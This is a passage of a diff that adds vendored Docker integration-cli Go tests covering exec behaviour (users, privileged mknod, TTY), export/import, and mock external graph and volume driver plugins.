:= os.OpenFile(netFilePath, os.O_WRONLY|os.O_SYNC|os.O_APPEND, 0644) + c.Assert(err, checker.IsNil) + + if _, err := f.Seek(0, 0); err != nil { + f.Close() + c.Fatal(err) + } + + if err := f.Truncate(0); err != nil { + f.Close() + c.Fatal(err) + } + + if _, err := f.Write([]byte("success2\n")); err != nil { + f.Close() + c.Fatal(err) + } + f.Close() + + res, _ := dockerCmd(c, "exec", contID, "cat", "/etc/"+fn) + c.Assert(res, checker.Equals, "success2\n") + } +} + +func (s *DockerSuite) TestExecWithUser(c *check.C) { + // TODO Windows CI: This may be fixable in the future once Windows + // supports users + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "--name", "parent", "busybox", "top") + + out, _ := dockerCmd(c, "exec", "-u", "1", "parent", "id") + c.Assert(out, checker.Contains, "uid=1(daemon) gid=1(daemon)") + + out, _ = dockerCmd(c, "exec", "-u", "root", "parent", "id") + c.Assert(out, checker.Contains, "uid=0(root) gid=0(root)", check.Commentf("exec with user by id expected daemon user got %s", out)) +} + +func (s *DockerSuite) TestExecWithPrivileged(c *check.C) { + // Not applicable on Windows + testRequires(c, DaemonIsLinux, NotUserNamespace) + // Start main loop which attempts mknod repeatedly + dockerCmd(c, "run", "-d", "--name", "parent", "--cap-drop=ALL", "busybox", "sh", "-c", `while (true); do if [ -e /exec_priv ]; then cat /exec_priv && mknod /tmp/sda b 8 0 && echo "Success"; else echo "Privileged exec has not run yet"; fi; usleep 10000; done`) + + // Check exec mknod doesn't work + cmd := exec.Command(dockerBinary, "exec", "parent", "sh", "-c", "mknod /tmp/sdb b 8 16") + out, _, err := runCommandWithOutput(cmd) + c.Assert(err, checker.NotNil, check.Commentf("exec mknod in --cap-drop=ALL container without --privileged should fail")) + c.Assert(out, checker.Contains, "Operation not permitted", check.Commentf("exec mknod in --cap-drop=ALL container without --privileged should fail")) + + // Check exec mknod does work with --privileged + cmd = exec.Command(dockerBinary, "exec", "--privileged", "parent", "sh", "-c", `echo "Running exec --privileged" > /exec_priv && mknod /tmp/sdb b 8 16 && usleep 50000 && echo "Finished exec --privileged" > /exec_priv && echo ok`) + out, _, err = runCommandWithOutput(cmd) + c.Assert(err, checker.IsNil) + + actual := strings.TrimSpace(out) + c.Assert(actual, checker.Equals, "ok", check.Commentf("exec mknod in --cap-drop=ALL container with --privileged failed, output: %q", out)) + + // Check subsequent unprivileged exec cannot mknod + cmd = exec.Command(dockerBinary, "exec", "parent", "sh", "-c", "mknod /tmp/sdc b 8 32") + out, _, err = runCommandWithOutput(cmd) + c.Assert(err, checker.NotNil, check.Commentf("repeating exec mknod in --cap-drop=ALL container after --privileged without --privileged should fail")) + c.Assert(out, checker.Contains, "Operation not permitted", check.Commentf("repeating exec mknod in --cap-drop=ALL container after --privileged without --privileged should fail")) + + // Confirm at no point was mknod allowed + logCmd := exec.Command(dockerBinary, "logs", "parent") + out, _, err = runCommandWithOutput(logCmd) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), "Success") + +} + +func (s *DockerSuite) TestExecWithImageUser(c *check.C) { + // Not applicable on Windows + testRequires(c, DaemonIsLinux) + name := "testbuilduser" + _, err := buildImage(name, + `FROM busybox + RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd + USER dockerio`, + true) + c.Assert(err, checker.IsNil) + + dockerCmd(c, "run", "-d", "--name", "dockerioexec", name, "top") + + out, _ := dockerCmd(c, "exec", "dockerioexec", "whoami") + c.Assert(out, checker.Contains, "dockerio", check.Commentf("exec with user by id expected dockerio user got %s", out)) +} + +func (s *DockerSuite) TestExecOnReadonlyContainer(c *check.C) { + // Windows does not support read-only + // --read-only + userns has remount issues + testRequires(c, DaemonIsLinux, NotUserNamespace) + dockerCmd(c, "run", "-d", "--read-only", "--name", "parent", "busybox", "top") + dockerCmd(c, "exec", "parent", "true") +} + +func (s *DockerSuite) TestExecUlimits(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testexeculimits" + runSleepingContainer(c, "-d", "--ulimit", "nproc=21", "--name", name) + c.Assert(waitRun(name), checker.IsNil) + + out, _, err := dockerCmdWithError("exec", name, "sh", "-c", "ulimit -p") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, "21") +} + +// #15750 +func (s *DockerSuite) TestExecStartFails(c *check.C) { + // TODO Windows CI. This test should be portable. Figure out why it fails + // currently. + testRequires(c, DaemonIsLinux) + name := "exec-15750" + runSleepingContainer(c, "-d", "--name", name) + c.Assert(waitRun(name), checker.IsNil) + + out, _, err := dockerCmdWithError("exec", name, "no-such-cmd") + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "executable file not found") +} + +// Fix regression in https://github.com/docker/docker/pull/26461#issuecomment-250287297 +func (s *DockerSuite) TestExecWindowsPathNotWiped(c *check.C) { + testRequires(c, DaemonIsWindows) + out, _ := dockerCmd(c, "run", "-d", "--name", "testing", minimalBaseImage(), "powershell", "start-sleep", "60") + c.Assert(waitRun(strings.TrimSpace(out)), check.IsNil) + + out, _ = dockerCmd(c, "exec", "testing", "powershell", "write-host", "$env:PATH") + out = strings.ToLower(strings.Trim(out, "\r\n")) + c.Assert(out, checker.Contains, `windowspowershell\v1.0`) +} + +func (s *DockerSuite) TestExecEnvLinksHost(c *check.C) { + testRequires(c, DaemonIsLinux) + runSleepingContainer(c, "-d", "--name", "foo") + runSleepingContainer(c, "-d", "--link", "foo:db", "--hostname", "myhost", "--name", "bar") + out, _ := dockerCmd(c, "exec", "bar", "env") + c.Assert(out, checker.Contains, "HOSTNAME=myhost") + c.Assert(out, checker.Contains, "DB_NAME=/bar/db") +} + +func (s *DockerSuite) TestExecWindowsOpenHandles(c *check.C) { + testRequires(c, DaemonIsWindows) + runSleepingContainer(c, "-d", "--name", "test") + exec := make(chan bool) + go func() { + dockerCmd(c, "exec", "test", "cmd", "/c", "start sleep 10") + exec <- true + }() + + for { + top := make(chan string) + var out string + go func() { + out, _ := dockerCmd(c, "top", "test") + top <- out + }() + + select { + case <-time.After(time.Second * 5): + c.Error("timed out waiting for top while exec is exiting") + case out = <-top: + break + } + + if strings.Count(out, "busybox.exe") == 2 && !strings.Contains(out, "cmd.exe") { + // The initial exec process (cmd.exe) has exited, and both sleeps are currently running + break + } + time.Sleep(1 * time.Second) + } + + inspect := make(chan bool) + go func() { + dockerCmd(c, "inspect", "test") + inspect <- true + }() + + select { + case <-time.After(time.Second * 5): + c.Error("timed out waiting for inspect while exec is exiting") + case <-inspect: + break + } + + // Ensure the background sleep is still running + out, _ := dockerCmd(c, "top", "test") + c.Assert(strings.Count(out, "busybox.exe"), checker.Equals, 2) + + // The exec should exit when the background sleep exits + select { + case <-time.After(time.Second * 15): + c.Error("timed out waiting for async exec to exit") + case <-exec: + // Ensure the background sleep has actually exited + out, _ := dockerCmd(c, "top", "test") + c.Assert(strings.Count(out, "busybox.exe"), checker.Equals, 1) + break + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_unix_test.go new file mode 100644 index 0000000000..5f691196f1 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_unix_test.go @@ -0,0 +1,93 @@ +// +build !windows,!test_no_exec + +package main + +import ( + "bytes" + "io" + "os/exec" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" + "github.com/kr/pty" +) + +// regression test for #12546 +func (s *DockerSuite) TestExecInteractiveStdinClose(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-itd", "busybox", "/bin/cat") + contID := strings.TrimSpace(out) + + cmd := exec.Command(dockerBinary, "exec", "-i", contID, "echo", "-n", "hello") + p, err := pty.Start(cmd) + c.Assert(err, checker.IsNil) + + b := bytes.NewBuffer(nil) + go io.Copy(b, p) + + ch := make(chan error) + go func() { ch <- cmd.Wait() }() + + select { + case err := <-ch: + c.Assert(err, checker.IsNil) + output := b.String() + c.Assert(strings.TrimSpace(output), checker.Equals, "hello") + case <-time.After(5 * time.Second): + c.Fatal("timed out running docker exec") + } +} + +func (s *DockerSuite) TestExecTTY(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + dockerCmd(c, "run", "-d", "--name=test", "busybox", "sh", "-c", "echo hello > /foo && top") + + cmd := exec.Command(dockerBinary, "exec", "-it", "test", "sh") + p, err := pty.Start(cmd) + c.Assert(err, checker.IsNil) + defer p.Close() + + _, err = p.Write([]byte("cat /foo && exit\n")) + c.Assert(err, checker.IsNil) + + chErr := make(chan error) + go func() { + chErr <- cmd.Wait() + }() + select { + case err := <-chErr: + c.Assert(err, checker.IsNil) + case <-time.After(3 * time.Second): + c.Fatal("timeout waiting for exec to exit") + } + + buf := make([]byte, 256) + read, err := p.Read(buf) + c.Assert(err, checker.IsNil) + c.Assert(bytes.Contains(buf, []byte("hello")), checker.Equals, true, check.Commentf(string(buf[:read]))) +} + +// Test the the TERM env var is set when -t is provided on exec +func (s *DockerSuite) TestExecWithTERM(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + out, _ := dockerCmd(c, "run", "-id", "busybox", "/bin/cat") + contID := strings.TrimSpace(out) + cmd := exec.Command(dockerBinary, "exec", "-t", contID, "sh", "-c", "if [ -z $TERM ]; then exit 1; else exit 0; fi") + if err := cmd.Run(); err != nil { + c.Assert(err, checker.IsNil) + } +} + +// Test that the TERM env var is not set on exec when -t is not provided, even if it was set +// on run +func (s *DockerSuite) TestExecWithNoTERM(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + out, _ := dockerCmd(c, "run", "-itd", "busybox", "/bin/cat") + contID := strings.TrimSpace(out) + cmd := exec.Command(dockerBinary, "exec", contID, "sh", "-c", "if [ -z $TERM ]; then exit 0; else exit 1; fi") + if err := cmd.Run(); err != nil { + c.Assert(err, checker.IsNil) + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_experimental_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_experimental_test.go new file mode 100644 index 0000000000..6a49cc8cb1 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_experimental_test.go @@ -0,0 +1,36 @@ +package main + +import ( + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestExperimentalVersionTrue(c *check.C) { + testRequires(c, ExperimentalDaemon) + + out, _ := dockerCmd(c, "version") + for _, line := range strings.Split(out, "\n") { + if strings.HasPrefix(strings.TrimSpace(line), "Experimental:") { + c.Assert(line, checker.Matches, "*true") + return + } + } + + c.Fatal(`"Experimental" not found in version output`) +} + +func (s *DockerSuite) TestExperimentalVersionFalse(c *check.C) { + testRequires(c, NotExperimentalDaemon) + + out, _ := dockerCmd(c, "version") + for _, line := range strings.Split(out, "\n") { + if strings.HasPrefix(strings.TrimSpace(line), "Experimental:") { + c.Assert(line, checker.Matches, "*false") + return + } + } + + c.Fatal(`"Experimental" not found in version output`) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_export_import_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_export_import_test.go new file mode 100644 index 0000000000..069dc08162 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_export_import_test.go @@ -0,0 +1,49 @@ +package main + +import ( + "os" + "os/exec" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// export an image and try to import it into a new one +func (s *DockerSuite) TestExportContainerAndImportImage(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := "testexportcontainerandimportimage" + + dockerCmd(c, "run", "--name", containerID, "busybox", "true") + + out, _ := dockerCmd(c, "export", containerID) + + importCmd := exec.Command(dockerBinary, "import", "-", "repo/testexp:v1") + importCmd.Stdin = strings.NewReader(out) + out, _, err := runCommandWithOutput(importCmd) + c.Assert(err, checker.IsNil, check.Commentf("failed to import image repo/testexp:v1: %s", out)) + + cleanedImageID := strings.TrimSpace(out) + c.Assert(cleanedImageID, checker.Not(checker.Equals), "", check.Commentf("output should have been an image id")) +} + +// Used to test output flag in the export command +func (s *DockerSuite) TestExportContainerWithOutputAndImportImage(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := "testexportcontainerwithoutputandimportimage" + + dockerCmd(c, "run", "--name", containerID, "busybox", "true") + dockerCmd(c, "export", "--output=testexp.tar", containerID) + defer os.Remove("testexp.tar") + + out, _, err := runCommandWithOutput(exec.Command("cat", "testexp.tar")) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + importCmd := exec.Command(dockerBinary, "import", "-", "repo/testexp:v1") + importCmd.Stdin = strings.NewReader(out) + out, _, err = runCommandWithOutput(importCmd) + c.Assert(err, checker.IsNil, check.Commentf("failed to import image repo/testexp:v1: %s", out)) + + cleanedImageID := strings.TrimSpace(out) + c.Assert(cleanedImageID, checker.Not(checker.Equals), "", check.Commentf("output should have been an image id")) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_external_graphdriver_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_external_graphdriver_unix_test.go new file mode 100644 index 0000000000..a794ca742d --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_external_graphdriver_unix_test.go @@ -0,0 +1,405 @@ +// +build !windows + +package main + +import ( + "encoding/json" + "fmt" + "io" + "io/ioutil" + "net/http" + "net/http/httptest" + "os" + "strings" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/daemon/graphdriver/vfs" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/plugins" + "github.com/go-check/check" +) + +func init() { + check.Suite(&DockerExternalGraphdriverSuite{ + ds: &DockerSuite{}, + }) +} + +type DockerExternalGraphdriverSuite struct { + server *httptest.Server + jserver *httptest.Server + ds *DockerSuite + d *Daemon + ec map[string]*graphEventsCounter +} + +type graphEventsCounter struct { + activations int + creations int + removals int + gets int + puts int + stats int + cleanups int + exists int + init int + metadata int + diff int + applydiff int + changes int + diffsize int +} + +func (s *DockerExternalGraphdriverSuite) SetUpTest(c *check.C) { + s.d = NewDaemon(c) +} + +func (s *DockerExternalGraphdriverSuite) OnTimeout(c *check.C) { + s.d.DumpStackAndQuit() +} + +func (s *DockerExternalGraphdriverSuite) TearDownTest(c *check.C) { + s.d.Stop() + s.ds.TearDownTest(c) +} + +func (s *DockerExternalGraphdriverSuite) SetUpSuite(c *check.C) { + s.ec = make(map[string]*graphEventsCounter) + s.setUpPluginViaSpecFile(c) + s.setUpPluginViaJSONFile(c) +} + +func (s *DockerExternalGraphdriverSuite) setUpPluginViaSpecFile(c *check.C) { + mux := http.NewServeMux() + s.server = httptest.NewServer(mux) + + s.setUpPlugin(c, "test-external-graph-driver", "spec", mux, []byte(s.server.URL)) +} + +func (s *DockerExternalGraphdriverSuite) setUpPluginViaJSONFile(c *check.C) { + mux := http.NewServeMux() + s.jserver = httptest.NewServer(mux) + + p := plugins.NewLocalPlugin("json-external-graph-driver", s.jserver.URL) + b, err := json.Marshal(p) + c.Assert(err, check.IsNil) + + s.setUpPlugin(c, "json-external-graph-driver", "json", mux, b) +} + +func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ext string, mux *http.ServeMux, b []byte) { + type graphDriverRequest struct { + ID string `json:",omitempty"` + Parent string `json:",omitempty"` + MountLabel string `json:",omitempty"` + ReadOnly bool `json:",omitempty"` + } + + type graphDriverResponse struct { + Err error `json:",omitempty"` + Dir string `json:",omitempty"` + Exists bool `json:",omitempty"` + Status [][2]string `json:",omitempty"` + Metadata map[string]string `json:",omitempty"` + Changes []archive.Change `json:",omitempty"` + Size int64 `json:",omitempty"` + } + + respond := func(w http.ResponseWriter, data interface{}) { + w.Header().Set("Content-Type", "appplication/vnd.docker.plugins.v1+json") + switch t := data.(type) { + case error: + fmt.Fprintln(w, fmt.Sprintf(`{"Err": %q}`, t.Error())) + case string: + fmt.Fprintln(w, t) + default: + json.NewEncoder(w).Encode(&data) + } + } + + decReq := func(b io.ReadCloser, out interface{}, w http.ResponseWriter) error { + defer b.Close() + if err := json.NewDecoder(b).Decode(&out); err != nil { + http.Error(w, fmt.Sprintf("error decoding json: %s", err.Error()), 500) + } + return nil + } + + base, err := ioutil.TempDir("", name) + c.Assert(err, check.IsNil) + vfsProto, err := vfs.Init(base, []string{}, nil, nil) + c.Assert(err, check.IsNil, check.Commentf("error initializing graph driver")) + driver := graphdriver.NewNaiveDiffDriver(vfsProto, nil, nil) + + s.ec[ext] = &graphEventsCounter{} + mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].activations++ + respond(w, `{"Implements": ["GraphDriver"]}`) + }) + + mux.HandleFunc("/GraphDriver.Init", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].init++ + respond(w, "{}") + }) + + mux.HandleFunc("/GraphDriver.CreateReadWrite", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].creations++ + + var req graphDriverRequest + if err := decReq(r.Body, &req, w); err != nil { + return + } + if err := driver.CreateReadWrite(req.ID, req.Parent, nil); err != nil { + respond(w, err) + return + } + respond(w, "{}") + }) + + mux.HandleFunc("/GraphDriver.Create", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].creations++ + + var req graphDriverRequest + if err := decReq(r.Body, &req, w); err != nil { + return + } + if err := driver.Create(req.ID, req.Parent, nil); err != nil { + respond(w, err) + return + } + respond(w, "{}") + }) + + mux.HandleFunc("/GraphDriver.Remove", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].removals++ + + var req graphDriverRequest + if err := decReq(r.Body, &req, w); err != nil { + return + } + + if err := driver.Remove(req.ID); err != nil { + respond(w, err) + return + } + respond(w, "{}") + }) + + mux.HandleFunc("/GraphDriver.Get", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].gets++ + + var req graphDriverRequest + if err := decReq(r.Body, &req, w); err != nil { + return + } + + dir, err := driver.Get(req.ID, req.MountLabel) + if err != nil { + respond(w, err) + return + } + respond(w, &graphDriverResponse{Dir: dir}) + }) + + mux.HandleFunc("/GraphDriver.Put", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].puts++ + + var req graphDriverRequest + if err := decReq(r.Body, &req, w); err != nil { + return + } + + if err := driver.Put(req.ID); err != nil { + respond(w, err) + return + } + respond(w, "{}") + }) + + mux.HandleFunc("/GraphDriver.Exists", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].exists++ + + var req graphDriverRequest + if err := decReq(r.Body, &req, w); err != nil { + return + } + respond(w, &graphDriverResponse{Exists: driver.Exists(req.ID)}) + }) + + mux.HandleFunc("/GraphDriver.Status", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].stats++ + respond(w, &graphDriverResponse{Status: driver.Status()}) + }) + + mux.HandleFunc("/GraphDriver.Cleanup", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].cleanups++ + err := driver.Cleanup() + if err != nil { + respond(w, err) + return + } + respond(w, `{}`) + }) + + mux.HandleFunc("/GraphDriver.GetMetadata", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].metadata++ + + var req graphDriverRequest + if err := decReq(r.Body, &req, w); err != nil { + return + } + + data, err := driver.GetMetadata(req.ID) + if err != nil { + respond(w, err) + return + } + respond(w, &graphDriverResponse{Metadata: data}) + }) + + mux.HandleFunc("/GraphDriver.Diff", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].diff++ + + var req graphDriverRequest + if err := decReq(r.Body, &req, w); err != nil { + return + } + + diff, err := driver.Diff(req.ID, req.Parent) + if err != nil { + respond(w, err) + return + } + io.Copy(w, diff) + }) + + mux.HandleFunc("/GraphDriver.Changes", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].changes++ + var req graphDriverRequest + if err := decReq(r.Body, &req, w); err != nil { + return + } + + changes, err := driver.Changes(req.ID, req.Parent) + if err != nil { + respond(w, err) + return + } + respond(w, &graphDriverResponse{Changes: changes}) + }) + + mux.HandleFunc("/GraphDriver.ApplyDiff", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].applydiff++ + diff := r.Body + defer r.Body.Close() + + id := r.URL.Query().Get("id") + parent := r.URL.Query().Get("parent") + + if id == "" { + http.Error(w, fmt.Sprintf("missing id"), 409) + } + + size, err := driver.ApplyDiff(id, parent, diff) + if err != nil { + respond(w, err) + return + } + respond(w, &graphDriverResponse{Size: size}) + }) + + mux.HandleFunc("/GraphDriver.DiffSize", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].diffsize++ + + var req graphDriverRequest + if err := decReq(r.Body, &req, w); err != nil { + return + } + + size, err := driver.DiffSize(req.ID, req.Parent) + if err != nil { + respond(w, err) + return + } + respond(w, &graphDriverResponse{Size: size}) + }) + + err = os.MkdirAll("/etc/docker/plugins", 0755) + c.Assert(err, check.IsNil, check.Commentf("error creating /etc/docker/plugins")) + + specFile := "/etc/docker/plugins/" + name + "." + ext + err = ioutil.WriteFile(specFile, b, 0644) + c.Assert(err, check.IsNil, check.Commentf("error writing to %s", specFile)) +} + +func (s *DockerExternalGraphdriverSuite) TearDownSuite(c *check.C) { + s.server.Close() + s.jserver.Close() + + err := os.RemoveAll("/etc/docker/plugins") + c.Assert(err, check.IsNil, check.Commentf("error removing /etc/docker/plugins")) +} + +func (s *DockerExternalGraphdriverSuite) TestExternalGraphDriver(c *check.C) { + testRequires(c, ExperimentalDaemon) + + s.testExternalGraphDriver("test-external-graph-driver", "spec", c) + s.testExternalGraphDriver("json-external-graph-driver", "json", c) +} + +func (s *DockerExternalGraphdriverSuite) testExternalGraphDriver(name string, ext string, c *check.C) { + if err := s.d.StartWithBusybox("-s", name); err != nil { + b, _ := ioutil.ReadFile(s.d.LogFileName()) + c.Assert(err, check.IsNil, check.Commentf("\n%s", string(b))) + } + + out, err := s.d.Cmd("run", "--name=graphtest", "busybox", "sh", "-c", "echo hello > /hello") + c.Assert(err, check.IsNil, check.Commentf(out)) + + err = s.d.Restart("-s", name) + + out, err = s.d.Cmd("inspect", "--format={{.GraphDriver.Name}}", "graphtest") + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), check.Equals, name) + + out, err = s.d.Cmd("diff", "graphtest") + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(strings.Contains(out, "A /hello"), check.Equals, true, check.Commentf("diff output: %s", out)) + + out, err = s.d.Cmd("rm", "-f", "graphtest") + c.Assert(err, check.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("info") + c.Assert(err, check.IsNil, check.Commentf(out)) + + err = s.d.Stop() + c.Assert(err, check.IsNil) + + // Don't check s.ec.exists, because the daemon no longer calls the + // Exists function. + c.Assert(s.ec[ext].activations, check.Equals, 2) + c.Assert(s.ec[ext].init, check.Equals, 2) + c.Assert(s.ec[ext].creations >= 1, check.Equals, true) + c.Assert(s.ec[ext].removals >= 1, check.Equals, true) + c.Assert(s.ec[ext].gets >= 1, check.Equals, true) + c.Assert(s.ec[ext].puts >= 1, check.Equals, true) + c.Assert(s.ec[ext].stats, check.Equals, 5) + c.Assert(s.ec[ext].cleanups, check.Equals, 2) + c.Assert(s.ec[ext].applydiff >= 1, check.Equals, true) + c.Assert(s.ec[ext].changes, check.Equals, 1) + c.Assert(s.ec[ext].diffsize, check.Equals, 0) + c.Assert(s.ec[ext].diff, check.Equals, 0) + c.Assert(s.ec[ext].metadata, check.Equals, 1) +} + +func (s *DockerExternalGraphdriverSuite) TestExternalGraphDriverPull(c *check.C) { + testRequires(c, Network, ExperimentalDaemon) + + c.Assert(s.d.Start(), check.IsNil) + + out, err := s.d.Cmd("pull", "busybox:latest") + c.Assert(err, check.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("run", "-d", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf(out)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_external_volume_driver_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_external_volume_driver_unix_test.go new file mode 100644 index 0000000000..806d87ec77 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_external_volume_driver_unix_test.go @@ -0,0 +1,627 @@ +// +build !windows + +package main + +import ( + "encoding/json" + "fmt" + "io" + "io/ioutil" + "net/http" + "net/http/httptest" + "os" + "os/exec" + "path/filepath" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/volume" + "github.com/go-check/check" +) + +const volumePluginName = "test-external-volume-driver" + +func init() { + check.Suite(&DockerExternalVolumeSuite{ + ds: &DockerSuite{}, + }) +} + +type eventCounter struct { + activations int + creations int + removals int + mounts int + unmounts int + paths int + lists int + gets int + caps int +} + +type DockerExternalVolumeSuite struct { + ds *DockerSuite + d *Daemon + *volumePlugin +} + +func (s *DockerExternalVolumeSuite) SetUpTest(c *check.C) { + s.d = NewDaemon(c) + s.ec = &eventCounter{} +} + +func (s *DockerExternalVolumeSuite) TearDownTest(c *check.C) { + s.d.Stop() + s.ds.TearDownTest(c) +} + +func (s *DockerExternalVolumeSuite) SetUpSuite(c *check.C) { + s.volumePlugin = newVolumePlugin(c, volumePluginName) +} + +type volumePlugin struct { + ec *eventCounter + *httptest.Server + vols map[string]vol +} + +type vol struct { + Name string + Mountpoint string + Ninja bool // hack used to trigger a null volume return on `Get` + Status map[string]interface{} + Options map[string]string +} + +func (p *volumePlugin) Close() { + p.Server.Close() +} + +func newVolumePlugin(c *check.C, name string) *volumePlugin { + mux := http.NewServeMux() + s := &volumePlugin{Server: httptest.NewServer(mux), ec: &eventCounter{}, vols: make(map[string]vol)} + + type pluginRequest struct { + Name string + Opts map[string]string + ID string + } + + type pluginResp struct { + Mountpoint string `json:",omitempty"` + Err string `json:",omitempty"` + } + + read := func(b io.ReadCloser) (pluginRequest, error) { + defer b.Close() + var pr pluginRequest + if err := json.NewDecoder(b).Decode(&pr); err != nil { + return pr, err + } + return pr, nil + } + + send := func(w http.ResponseWriter, data interface{}) { + switch t := data.(type) { + case error: + http.Error(w, t.Error(), 500) + case string: + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintln(w, t) + default: + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + json.NewEncoder(w).Encode(&data) + } + } + + mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) { + s.ec.activations++ + send(w, `{"Implements": ["VolumeDriver"]}`) + }) + + mux.HandleFunc("/VolumeDriver.Create", func(w http.ResponseWriter, r *http.Request) { + s.ec.creations++ + pr, err := read(r.Body) + if err != nil { + send(w, err) + return + } + _, isNinja := pr.Opts["ninja"] + status := map[string]interface{}{"Hello": "world"} + s.vols[pr.Name] = vol{Name: pr.Name, Ninja: isNinja, Status: status, Options: pr.Opts} + send(w, nil) + }) + + mux.HandleFunc("/VolumeDriver.List", func(w http.ResponseWriter, r *http.Request) { + s.ec.lists++ + vols := make([]vol, 0, len(s.vols)) + for _, v := range s.vols { + if v.Ninja { + continue + } + vols = append(vols, v) + } + send(w, map[string][]vol{"Volumes": vols}) + }) + + mux.HandleFunc("/VolumeDriver.Get", func(w http.ResponseWriter, r *http.Request) { + s.ec.gets++ + pr, err := read(r.Body) + if err != nil { + send(w, err) + return + } + + v, exists := s.vols[pr.Name] + if !exists { + send(w, `{"Err": "no such volume"}`) + } + + if v.Ninja { + send(w, map[string]vol{}) + return + } + + v.Mountpoint = hostVolumePath(pr.Name) + send(w, map[string]vol{"Volume": v}) + return + }) + + mux.HandleFunc("/VolumeDriver.Remove", func(w http.ResponseWriter, r *http.Request) { + s.ec.removals++ + pr, err := read(r.Body) + if err != nil { + send(w, err) + return + } + + v, ok := s.vols[pr.Name] + if !ok { + send(w, nil) + return + } + + if err := os.RemoveAll(hostVolumePath(v.Name)); err != nil { + send(w, &pluginResp{Err: err.Error()}) + return + } + delete(s.vols, v.Name) + send(w, nil) + }) + + mux.HandleFunc("/VolumeDriver.Path", func(w http.ResponseWriter, r *http.Request) { + s.ec.paths++ + + pr, err := read(r.Body) + if err != nil { + send(w, err) + return + } + p := hostVolumePath(pr.Name) + send(w, &pluginResp{Mountpoint: p}) + }) + + mux.HandleFunc("/VolumeDriver.Mount", func(w http.ResponseWriter, r *http.Request) { + s.ec.mounts++ + + pr, err := read(r.Body) + if err != nil { + send(w, err) + return + } + + if v, exists := s.vols[pr.Name]; exists { + // Use this to simulate a mount failure + if _, exists := v.Options["invalidOption"]; exists { + send(w, fmt.Errorf("invalid argument")) + return + } + } + + p := hostVolumePath(pr.Name) + if err := os.MkdirAll(p, 0755); err != nil { + send(w, &pluginResp{Err: err.Error()}) + return + } + + if err := ioutil.WriteFile(filepath.Join(p, "test"), []byte(s.Server.URL), 0644); err != nil { + send(w, err) + return + } + + if err := ioutil.WriteFile(filepath.Join(p, "mountID"), []byte(pr.ID), 0644); err != nil { + send(w, err) + return + } + + send(w, &pluginResp{Mountpoint: p}) + }) + + mux.HandleFunc("/VolumeDriver.Unmount", func(w http.ResponseWriter, r *http.Request) { + s.ec.unmounts++ + + _, err := read(r.Body) + if err != nil { + send(w, err) + return + } + + send(w, nil) + }) + + mux.HandleFunc("/VolumeDriver.Capabilities", func(w http.ResponseWriter, r *http.Request) { + s.ec.caps++ + + _, err := read(r.Body) + if err != nil { + send(w, err) + return + } + + send(w, `{"Capabilities": { "Scope": "global" }}`) + }) + + err := os.MkdirAll("/etc/docker/plugins", 0755) + c.Assert(err, checker.IsNil) + + err = ioutil.WriteFile("/etc/docker/plugins/"+name+".spec", []byte(s.Server.URL), 